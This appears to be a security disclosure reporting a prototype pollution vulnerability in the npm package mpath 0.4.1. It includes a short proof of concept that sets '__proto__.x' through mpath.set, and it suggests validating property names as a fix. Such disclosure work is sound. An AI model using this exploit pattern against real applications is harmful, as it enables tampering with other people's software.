I would like to report prototype pollution vulnerability in mpath.
It allows an attacker to inject arbitrary properties on Object.prototype.
module name: mpathversion:0.4.1npm page: https://www.npmjs.com/package/mpath
{G,S}et javascript object values using MongoDB-like path notatio
305,874 downloads in the last week
An attacker can specify a path that include the prototype object, and thus overwrite important properties on Object.prototype or add new ones.
var mpath = require("mpath");
var obj = {
comments: [
{ title: 'funny' },
{ title: 'exciting!' }
]
}
mpath.set('__proto__.x', ['hilarious', 'fruity'], obj);
console.log({}.x);
N/A validate property names before overwriting them and prevent write to certain paths.
This may be an intended behaviour of this module, but it needs to be better documented. Moreover, to properly analyse the impact of this vulnerability one must look at the clients of this module, such as mongoose and see if attackers can realistically control the path value.